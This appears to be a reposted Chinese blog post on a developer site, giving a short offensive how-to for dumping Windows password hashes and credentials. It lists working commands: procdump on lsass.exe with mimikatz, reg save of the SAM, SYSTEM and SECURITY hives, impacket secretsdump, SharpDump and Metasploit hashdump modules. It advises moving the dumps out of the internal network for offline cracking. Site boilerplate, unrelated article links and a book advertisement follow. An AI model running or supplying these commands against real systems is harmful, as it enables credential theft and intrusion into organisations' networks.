内容简介:测试机器: Windows 10 1809Procdump(管理员权限下运行)
推荐使用 Procdump,reg 和 sharpdump 导出本地,再想办法从内网中运出来本地破解
测试机器: Windows 10 1809
0x01 Procdump + Mimikatz
Procdump
(管理员权限下运行)
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits
然后本地解出hash即可
sekurlsa::minidump C:\lsass.dmp sekurlsa::logonpasswords full
0x02 Reg + impacket/Mimikatz (强推)
使用 Reg 需要NT/SYSTEM权限
reg save HKLM\SYSTEM system.hiv reg save HKLM\SAM sam.hiv reg save HKLM\security security.hiv
Mimikatz 调用 lsadump
lsadump::sam /system:system.hiv /sam:sam.hiv
impacket/secretsdump.py
python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL
0x03 Sharpdump (强推)
Out-Minidump.ps1 的 C#版本 编译结果
需要.NET 3.5版本框架
0x04 Wce、Quarks PwDump、GetPass……
没怎么用过,都是以前比较老的,Getpass是Mimikatz的编译版本,没啥意思
0x05 Msf modules
hashdump
条件:
- Meterpreter Session
- NT/SYSTEM
hashdump只能dump本地用户
smart_hashdump
条件
- Meterpreter Session
- NT/SYSTEM
可以dump本地 + 域用户hash
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- 如何使用代理IP进行数据抓取,PHP爬虫抓取亚马逊商品数据
- 抓取 Grafana Panel 视图
- Python爬虫:抓取新浪新闻数据
- Python抓取花瓣网高清美图
- Python爬虫:抓取新浪新闻数据
- 灵巧工业机器人(一)抓取
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
产品经理手册(原书第4版)(白金版)
[美] 琳达·哥乔斯(Linda Gorchels) / 祝亚雄、冯华丽、金骆彬 / 机械工业出版社 / 2017-8 / 65.00
产品经理的职责起点是新产品开发,贯穿产品生命周期的全过程。本书按上下游产品管理进行组织。 在上游的新产品开发流程中,作者阐述了如何从市场、产品、行业、公司的角度规划企划方案,并获得老板、销售部、运营部的资源支持,推进新产品的项目流程,实现所有目标,制定和实施新产品发布。 下游产品的管理核心在于生命周期的管理,营销更是生命周期管理的重中之重。产品经理如何让产品满足客户需求,让客户获得对产......一起来看看 《产品经理手册(原书第4版)(白金版)》 这本书的介绍吧!
CSS 压缩/解压工具
在线压缩/解压 CSS 代码
随机密码生成器
多种字符组合密码